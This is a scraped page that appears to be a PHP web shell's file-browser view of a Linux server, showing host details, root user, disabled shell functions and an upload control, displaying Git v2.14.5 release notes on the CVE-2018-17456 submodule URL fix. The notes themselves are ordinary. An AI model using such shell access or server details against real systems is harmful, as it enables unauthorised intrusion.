HEX
Server: nginx/1.22.0
System: Linux iZuf6jdxbygmf6cco977lcZ 5.10.84-10.4.al8.x86_64 #1 SMP Tue Apr 12 12:31:07 CST 2022 x86_64
User: root (0)
PHP: 7.4.29
Disabled: passthru,exec,system,chroot,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_restore,dl,readlink,symlink,popepassthru,stream_socket_server,fsocket,popen
$ pwd: /usr/share/doc/git/RelNotes/
Upload Files
File: //usr/share/doc/git/RelNotes/2.14.5.txt
Git v2.14.5 Release Notes
=========================

This release is to address the recently reported CVE-2018-17456.

Fixes since v2.14.4
-------------------

 * Submodules' "URL"s come from the untrusted .gitmodules file, but
   we blindly gave it to "git clone" to clone submodules when "git
   clone --recurse-submodules" was used to clone a project that has
   such a submodule.  The code has been hardened to reject such
   malformed URLs (e.g. one that begins with a dash).

Credit for finding and fixing this vulnerability goes to joernchen
and Jeff King, respectively.
@ Telegram